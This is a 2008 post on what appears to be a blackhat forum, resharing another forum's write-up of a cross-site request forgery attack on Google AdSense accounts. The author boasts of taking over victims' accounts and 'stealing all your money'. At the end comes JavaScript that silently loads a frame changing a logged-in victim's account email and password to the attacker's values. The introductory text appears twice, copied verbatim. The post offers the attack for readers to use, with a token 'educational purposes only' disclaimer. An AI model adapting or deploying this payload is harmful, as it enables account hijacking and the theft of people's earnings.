kojakfull
Senior Member
- Jan 13, 2008
- 852
- 1,055
Ok guys i just get this from another private blackhat forum and wanted to share it here. I didnt try this yet coz i dont know how it works maybe someone can get this working.
here it is:
******************************************
Ok guys this is real Heavy Blackhat!!!!!!
Do not try this at Home or at all / or ONLY ON YOUR OWN ACCOUNT
EDUCATIONAL PURPASES ONLY!!!!!!!!
This is a kind of CSRF hackish something. Normally I don't do a lot of CSRF but this time I could not resist to try it on myself. It works very simple. I hava a page on my server which writes the email and password change URI from your Google adsense account. Into that URI I just paste my emailadres and my password. If you open this file and you are logged into Adsense inside another Firefox tab or MSIE screen, I will reset your login credentials to my own and stealing all your money. -great isn't it, tabbed browsing?- *grin*
I'm amazed it's just that easy to do, with the help of bad cookie based authentication.
Granted, the owner will get an email, but he doesn't have to do anything. it's changed by default when it happens. If it doesn't work out, we can also try to change the password alone.
here it is:
******************************************
Ok guys this is real Heavy Blackhat!!!!!!
Do not try this at Home or at all / or ONLY ON YOUR OWN ACCOUNT
EDUCATIONAL PURPASES ONLY!!!!!!!!
This is a kind of CSRF hackish something. Normally I don't do a lot of CSRF but this time I could not resist to try it on myself. It works very simple. I hava a page on my server which writes the email and password change URI from your Google adsense account. Into that URI I just paste my emailadres and my password. If you open this file and you are logged into Adsense inside another Firefox tab or MSIE screen, I will reset your login credentials to my own and stealing all your money. -great isn't it, tabbed browsing?- *grin*
I'm amazed it's just that easy to do, with the help of bad cookie based authentication.
Granted, the owner will get an email, but he doesn't have to do anything. it's changed by default when it happens. If it doesn't work out, we can also try to change the password alone.
<script type="text/javascript" language="JavaScript">
var w = "500"
var h = "500"
var s =
'https://www.google.com/accounts/UpdateEmail?service=adsense&[email protected]&Passwd=cool&save='
document.write("<iframe style='width:" + w + "; height:" + h + ";' ");
document.write("align='center' marginwidth='0' marginheight='0' ");
document.write("scrolling='no' frameborder='0' id='awglogin' name='awglogin' ");
document.write("src='" + s + "'>");
document.write("</iframe>");
</script>